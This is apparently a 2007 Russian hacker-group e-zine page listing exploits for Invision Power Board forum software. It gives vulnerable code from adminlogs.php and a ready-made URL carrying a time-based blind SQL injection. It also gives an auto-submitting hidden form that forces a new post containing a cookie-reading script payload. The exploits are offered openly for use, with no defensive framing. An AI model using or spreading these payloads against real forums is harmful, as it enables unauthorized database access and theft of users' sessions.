![]() |
![]() |
Chanel: #TGBR, #hack-psihoz, Service: irc.dalnet.ru, Port: 6667
TGBR E-ZineS #1:
IPB <= 2.3.3 SQL injection: Код:
------------- adminlogs.php ------------- BUG FOUND: perdimonokl aka 4nob1oz BUG FOUND DATE: 24/11/2007 BUG DISCOVERED DATE: NOT YET /* * VULN FUNCTION * ---------------- * * function view() * * ---------------- * VULN CODE * * -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * else * { * $this->ipsclass->input['search_string'] = urldecode($this->ipsclass->input['search_string']); * * $dbq = "m.".$this->ipsclass->input['search_type']." LIKE '%".$this->ipsclass->input['search_string']."%'"; * * $row = $this->ipsclass->DB->build_and_exec_query( array( 'select' => 'COUNT(m.id) as count', 'from' => 'admin_logs m', 'where' => $dbq ) ); * * $row_count = $row['count']; * * $query = "&act=adminlog&code=view&search_type={$this->ipsclass->input['search_type']}&search_string=".urlencode($this->ipsclass->input['search_string']); * * $this->ipsclass->DB->cache_add_query( 'adminlogs_view_two', array( 'dbq' => $dbq, 'limit_a' => $start ) ); * $this->ipsclass->DB->cache_exec_query(); * } * * -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- * */ EXPLOIT ------- adsess=85f93b41dd3244e5680f5085b28b56bf ---> When you login to admin panel you open admin session and you can see it in variable "adsess=" Replace the "adsess=" in url with your own http://localhost/forum/admin/index.php?adsess=85f93b41dd3244e5680f5085b28b56bf§ion=admin&act=adminlog&code=view&act=adminlog§ion=admin&search_string=333&search_type=act+and+1=if(substring(version(),1,1)=5,1,benchmark(999999,md5(now())))--
Код:
<body onload="preview.submit();"> <center> <form id='postingform' action="http://САЙТ_ФОРУМ_ipb.2.1.7/index.php?act=post&do=new_post&f=НОМЕР_ТЕМЫ" method="post" name="preview"> <input type="hidden" name="st" size="30" tabindex="3" maxlength="300" value='0'> <input type="hidden" name="act" size="30" tabindex="3" maxlength="300" value='Post'> <input type="hidden" name="s" size="30" tabindex="3" maxlength="300" value=''> <input type="hidden" name="TopicTitle" size="30" tabindex="3" maxlength="300" value='tttttttttt1'> <input type="hidden" name="TopicDesc" size="30" tabindex="3" maxlength="300" value='tttttttttt2'> <input type="hidden" name="poll_question" size="30" tabindex="3" maxlength="300" value='tttttttttt3'> <input type="hidden" name="question[1]" size="30" tabindex="3" maxlength="300" value='</script><script>alert(document.cookie)</script><script>'> <input type="hidden" name="Post" size="30" tabindex="3" maxlength="300" value='textatatatatatatatata'> <input type="hidden" name="enableemo" size="30" tabindex="3" maxlength="300" value='yes'> <input type="hidden" name="enablesig" size="30" tabindex="3" maxlength="300" value='yes'> <input type="hidden" name="mod_options" size="30" tabindex="3" maxlength="300" value='nowt'> <input type="hidden" name="iconid" size="30" tabindex="3" maxlength="300" value='0'> <input type="hidden" name="preview" size="30" tabindex="3" maxlength="300" value='Предварительный просмотр'>
XSS#2 |
Created by TGBR Community
All Right's Reserved Trash 2007 ©